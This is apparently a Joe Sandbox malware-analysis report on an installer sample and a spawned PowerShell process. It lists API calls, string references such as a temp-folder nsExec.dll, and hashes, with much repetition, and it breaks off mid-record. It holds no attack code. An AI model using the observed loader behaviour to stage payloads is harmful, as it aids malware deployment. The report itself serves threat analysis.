Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 57426068bb78e7fc12ff25959f7bd679cb8cd8833ff19df23162cb9bd9f4a020
Instruction ID: cf871c65d4e4f3ee9653570a57c4ed279446943cd2c239248b6b376061a1ea1e
Opcode Fuzzy Hash: 57426068bb78e7fc12ff25959f7bd679cb8cd8833ff19df23162cb9bd9f4a020
Instruction Fuzzy Hash: 3F115AB2900108BEDB01AFA5D881DEEBBB9EF04344F10807AF505F21A1E7789A54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 004056A3 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,pivot\drukmaases.kin,?,0040570F,pivot\drukmaases.kin,pivot\drukmaases.kin,?,?,74DF3410,0040545A,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 004056B1
CharNextA.USER32(00000000), ref: 004056B6
CharNextA.USER32(00000000), ref: 004056CA

Strings

pivot\drukmaases.kin, xrefs: 004056A4

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: CharNext
String ID: pivot\drukmaases.kin
API String ID: 3213498283-360973136
Opcode ID: b743ab26e54571032f58e362f9be0a160f4e35464d45215ae3ba9b7d85bee3d6
Instruction ID: a5f0db424de3ece2f93da8fa8465ac66cd1a9633bcd5b70ea5e8f5e09e52a010
Opcode Fuzzy Hash: b743ab26e54571032f58e362f9be0a160f4e35464d45215ae3ba9b7d85bee3d6
Instruction Fuzzy Hash: 04F0C251D04F602BFB3256240C54B775FACCB55360F980867E648662D2C6BE4C419FAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402BC7 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402DA7,00000001), ref: 00402BDA
GetTickCount.KERNEL32 ref: 00402BF8
CreateDialogParamA.USER32(0000006F,00000000,00402B44,00000000), ref: 00402C15
ShowWindow.USER32(00000000,00000005), ref: 00402C23

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: edb15b2a557076f8163c7a3e93653ceb388576ec72b14a846b112ddb74d149d0
Instruction ID: 21b079e0603347407b0e8bea5ce89a635a222a91f4c3b4b14634b7546a67a8fd
Opcode Fuzzy Hash: edb15b2a557076f8163c7a3e93653ceb388576ec72b14a846b112ddb74d149d0
Instruction Fuzzy Hash: 7BF03A3080A620BFC6526F24BE4DA8F7B64EB05B52B504866F104B51A4D778A8828BEC

Uniqueness

Uniqueness Score: -1.00%

Function 00404DD9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404E08
CallWindowProcA.USER32(?,?,?,?), ref: 00404E59

Part of subcall function 00403EB4: SendMessageA.USER32(00010468,00000000,00000000,00000000), ref: 00403EC6

Strings

, xrefs: 00404DE9

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 5ed24ab9ef33d489e1b468578e452bb34f2c3a50ff0390caf4459e3fa9b2335e
Instruction ID: 160e060997078783acc2d08be4eebd9c773d2cb3c3e72dd3afa02660fee5d696
Opcode Fuzzy Hash: 5ed24ab9ef33d489e1b468578e452bb34f2c3a50ff0390caf4459e3fa9b2335e
Instruction Fuzzy Hash: 7E0171B1100248AFDF219F11DD84A9B3B2AFBC4715F104037FB04762E1C3399C5296AA

Uniqueness

Uniqueness Score: -1.00%

Function 004024D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024F1
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,?,?,00000000,00000011), ref: 00402510

Strings

C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll, xrefs: 004024DF, 00402504

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll
API String ID: 427699356-3517045108
Opcode ID: 331d61a22114231173238dbc38848ac129e5b24e8850ffeb9f8ee4d8dade2d0f
Instruction ID: 99ee78c1eccbef78809478a7420901dcf2550f89e1355c3fa2d0585c42f5b742
Opcode Fuzzy Hash: 331d61a22114231173238dbc38848ac129e5b24e8850ffeb9f8ee4d8dade2d0f
Instruction Fuzzy Hash: E2F0E972A44244EFDB40EBB08E4A9EF3268DB01304F10443FB141F61C2D5FC4941A76E

Uniqueness

Uniqueness Score: -1.00%

Function 0040356E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3410,00403546,0040338A,?), ref: 00403588
GlobalFree.KERNEL32(00000000), ref: 0040358F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403580

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 3009e9edeeaf225471aa20a49794f7f9debd27987f3a1fde2fe5324fb2cef97b
Instruction ID: c435f3d6a1630fa5b517ded6fe9ed7dc0ebc24c208808f32919fc3bc69cf13a8
Opcode Fuzzy Hash: 3009e9edeeaf225471aa20a49794f7f9debd27987f3a1fde2fe5324fb2cef97b
Instruction Fuzzy Hash: EBE08C32844120ABC6216FA4EC0871AB7686B58B22F06842BEC017B2B0837C2D424B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C97,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\hnTW5HdWvY.exe,C:\Users\user\Desktop\hnTW5HdWvY.exe,80000000,00000003), ref: 00405657
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C97,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\hnTW5HdWvY.exe,C:\Users\user\Desktop\hnTW5HdWvY.exe,80000000,00000003), ref: 00405665

Strings

C:\Users\user\Desktop, xrefs: 00405651

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
Instruction ID: 7d1453c19011f5abfc5d5d617c6b663c4d95b5fcfd1fb09af13cacd58312ca43
Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
Instruction Fuzzy Hash: 78D0A762409D702EE30363109C04B8F7A58CF12300F4904A2E080E6195C6791D414BAD

Uniqueness

Uniqueness Score: -1.00%

Function 100017FC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,00000000,00000000,?,?,1000129F,00000000,/TIMEOUT=,00000000), ref: 1000180C
lstrcmpiA.KERNEL32(?,?), ref: 10001824
CharNextA.USER32(?,?,?,1000129F,00000000,/TIMEOUT=,00000000), ref: 10001835
lstrlenA.KERNEL32(?,?,?,1000129F,00000000,/TIMEOUT=,00000000), ref: 1000183E

Memory Dump Source

Source File: 00000000.00000002.1660349596.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1660317252.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1660367794.0000000010002000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1660387960.0000000010003000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1660407195.0000000010004000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_hnTW5HdWvY.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 910ea4aa531fe9bf27a28eac16cc488e500561e24c713f869ebd536bab5d5233
Instruction ID: 7f82a7291824057eacc5956e7a05f4c8d228b72dba14fabd960d24b7c05b1b03
Opcode Fuzzy Hash: 910ea4aa531fe9bf27a28eac16cc488e500561e24c713f869ebd536bab5d5233
Instruction Fuzzy Hash: 68F09036605568FFE712DFA4CC409DEBBA8EF05290B2580A5EC00D7216DB70EF01EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00405770 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040599F,00000000,[Rename],00000000,00000000,00000000), ref: 00405780
lstrcmpiA.KERNEL32(0040599F,00000000), ref: 00405798
CharNextA.USER32(0040599F,?,00000000,0040599F,00000000,[Rename],00000000,00000000,00000000), ref: 004057A9
lstrlenA.KERNEL32(0040599F,?,00000000,0040599F,00000000,[Rename],00000000,00000000,00000000), ref: 004057B2

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
Instruction ID: 10a66d07964700c4564cfa3c9d38ab292ebab1a3a98e0b2fc59037c9a3325cbe
Opcode Fuzzy Hash: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
Instruction Fuzzy Hash: B1F0C235605558FFD7129BA5DD4099EBBA8EF06350F2100AAF800F7211D274EE01ABA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 4320, Parent PID: 6748COMMON

Executed Functions

Function 0489F4F8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 869e5d477f0c3feb9fe79c1c2d162694de69d3df610e2d4bf0da420de0a86c68
Instruction ID: bc76023fcc9634fed3628d493d603477cd756c523891305f7ac902cb0d0c7949
Opcode Fuzzy Hash: 869e5d477f0c3feb9fe79c1c2d162694de69d3df610e2d4bf0da420de0a86c68
Instruction Fuzzy Hash: F8B16070E006099FDF18CFA9D88579DBBF2AF88304F188A29E615E7254EB74AC45CF41

Uniqueness

Uniqueness Score: -1.00%

Function 07451951 Relevance: 22.2, Strings: 17, Instructions: 926COMMON

Download Yara Rule

Strings

$qq, xrefs: 074523E5
$qq, xrefs: 074523F5
4'qq, xrefs: 07451EFB
$qq, xrefs: 074520C9
4'qq, xrefs: 07452415
$qq, xrefs: 074520B9
4'qq, xrefs: 07451F07
84bl, xrefs: 074522DD
$qq, xrefs: 074522A1
4'qq, xrefs: 07452421
tPqq, xrefs: 07452328
$qq, xrefs: 07452285
84bl, xrefs: 074522D3
$qq, xrefs: 0745206E
4'qq, xrefs: 074520E8
tPqq, xrefs: 07452334
4'qq, xrefs: 074520F4

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: 4'qq$4'qq$4'qq$4'qq$4'qq$4'qq$84bl$84bl$tPqq$tPqq$$qq$$qq$$qq$$qq$$qq$$qq$$qq
API String ID: 0-2218257937
Opcode ID: 2073dc06c4ee84fd799d732acb3ec54b1a052726e373110958bc0364e5fd640f
Instruction ID: f1444bf5936a490995f4999ff2485d18220813202e637d33b928be697910c31a
Opcode Fuzzy Hash: 2073dc06c4ee84fd799d732acb3ec54b1a052726e373110958bc0364e5fd640f
Instruction Fuzzy Hash: 28729FF1B1421ADFDB148B68C441AEABBA2BF89311F14C467ED059B356CB71DC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07453A50 Relevance: 15.9, Strings: 12, Instructions: 920COMMON

Download Yara Rule

Strings

(fdl, xrefs: 0745532D
(fdl, xrefs: 07455323
4'qq, xrefs: 07453BA9
tPqq, xrefs: 07453D40
(fdl, xrefs: 07454E85
x.Uk, xrefs: 07454638
-Uk, xrefs: 0745467D
(fdl, xrefs: 07454E7B
tPqq, xrefs: 07453D34
4'qq, xrefs: 074543F8
4'qq, xrefs: 074543EC
4'qq, xrefs: 07453BB5

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: (fdl$(fdl$(fdl$(fdl$4'qq$4'qq$4'qq$4'qq$tPqq$tPqq$x.Uk$-Uk
API String ID: 0-2021172462
Opcode ID: f5892030b3a725e22ff4666a1f418c0fec650d1fa9dac702afd08815b9f3754e
Instruction ID: 38ea0569c8509770c92fff7fcbf7ff6e34cae4fd2a67e0eb542d3f63bc253330
Opcode Fuzzy Hash: f5892030b3a725e22ff4666a1f418c0fec650d1fa9dac702afd08815b9f3754e
Instruction Fuzzy Hash: 4A72B3B0B102559FDB14CF68C851BAABBF2AF85305F14C4AAD9059F392CB71ED81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 074554B8 Relevance: 10.4, Strings: 8, Instructions: 373COMMON

Download Yara Rule

Strings

4'qq, xrefs: 07455840
(fdl, xrefs: 074555E3
(fdl, xrefs: 074555D9
-Uk, xrefs: 074558D1
x.Uk, xrefs: 0745588C
4'qq, xrefs: 074557CD
4'qq, xrefs: 074557C1
4'qq, xrefs: 0745584C

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: (fdl$(fdl$4'qq$4'qq$4'qq$4'qq$x.Uk$-Uk
API String ID: 0-2488139585
Opcode ID: 5938b0359364e4cfd9dcd91b8dae43350a6da5837682bb15189693d8b45b481a
Instruction ID: b381af0cc9acc52a1417af3a4391e0e7f44ebbae872b852e1f7a83080e8dce4f
Opcode Fuzzy Hash: 5938b0359364e4cfd9dcd91b8dae43350a6da5837682bb15189693d8b45b481a
Instruction Fuzzy Hash: 9AE1A1B4A102059BCB04DB68C455BAEBBF3AF88305F24C46AD9056F796CB71EC42CF91

Uniqueness

Uniqueness Score: -1.00%

Function 07450850 Relevance: 6.8, Strings: 5, Instructions: 591COMMON

Download Yara Rule

Strings

$qq, xrefs: 07450DA1
$qq, xrefs: 07450D39
4'qq, xrefs: 074508B2
$qq, xrefs: 07450DAD
4'qq, xrefs: 074508BE

Memory Dump Source

